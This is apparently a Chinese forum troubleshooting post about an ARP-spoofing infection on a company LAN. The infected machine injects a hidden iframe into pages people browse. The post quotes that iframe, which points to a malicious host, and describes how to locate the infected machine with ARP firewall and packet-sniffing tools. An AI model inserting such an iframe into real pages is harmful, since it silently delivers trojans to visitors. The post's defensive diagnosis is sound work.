病毒现象:

1:从5月8日上班开始,登录公司某系统后,出现乱码,后检查后发现,在登录页面源代码第一行出现奇怪代码:

<iframe style='display:none' src=http://７Ｙ７．ＵＳ／１．ＨＴＭ></iframe>

并且各种防病毒软件报xx.jpg病毒错误,网页页面显示不完整!

2:无法登录windows update官方网址,以及工商银行等网址

3:局域网内某网段地址内部分机器访问网页正常,部分不正常.

4:外地用户通过公网用域名访问公司的系统不会出现问题.

5:在某段时间之后,突然全部正常,病毒发作时间不定时,不定量. 并可能伴随网络连接问题,网没有断,但网络不通.但是 可能在某个时候突然全好了．

6:在5月14号左右病毒地址变更为１６Ａ．ＵＳ／２．ＨＴＭ

7:使用网上各种专杀工具无效,

8:论坛中方法(参考如下)也试过,根本无法显示“发现ARP欺骗数据包”和“欺骗数据详细记录.

9:中毒机器(访问系统错误的机器)拿到其他网段没有问题.而我的机器拿到病毒发生网段也没有问题,非常奇怪.

个人怀疑::在局域网中有若干机器中毒,其他机器可能存在漏洞.或许是某个客户机器有病毒,当他连接局域网时,就使得病毒泛滥.当他断网时又突然所有人都可以正常使用.

解决方案：

一般局域网中有一个ARP 中毒电脑，该电脑会伪装成网关，这样全网电脑浏览网页的时候都有

增加 http://７Ｙ７．ＵＳ／１．ＨＴＭ这样的恶意代码，这个病毒关联这木马。

建议用ARP防火墙(AntiARP) 来定位出中毒电脑，也可以用 Sniffer Pro 抓包，

看看是那个电脑在向全网发送ARP 广播，找到中毒电脑后拔网线杀毒即可。

防止ARP地址欺骗软件AntiArp下载:http://www.motoyi.com/Down/Noted/200705/Down_34.shtml